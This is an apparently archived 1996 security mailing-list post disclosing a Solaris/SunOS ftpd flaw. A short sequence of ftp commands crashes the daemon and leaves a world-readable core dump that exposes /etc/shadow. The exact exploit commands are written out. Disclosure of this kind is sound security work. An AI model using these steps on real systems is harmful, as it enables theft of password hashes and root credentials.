Martin's method works for Solaris 2.5.1 as well. 'strings' on the core file
reveals the complete contents of /etc/shadow. This is not good. To reiterate,
if someone else is running an ftp session on host_a, start your own ftp
session with host_a. Then issue the commands
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv
Examine the resulting core file with the strings command.
This method does not work with Solaris 2.4.
>
> James Poland 6-5251 wrote:
> >
> > On Solaris 2.5.1, the core file contains only the user's password in
> > cleartext. How hard is it to crash someone else's ftp session?
>
> Killing from the command line doesn't seem to work, but:
>
> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin
>
> PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
> so the seem to have used the proposed fix
>
> Checking for "pw != NULL"
>
> So this proposal was simple and obvious ... and incomplete. :)
>
Received on Oct 16 1996
Intro
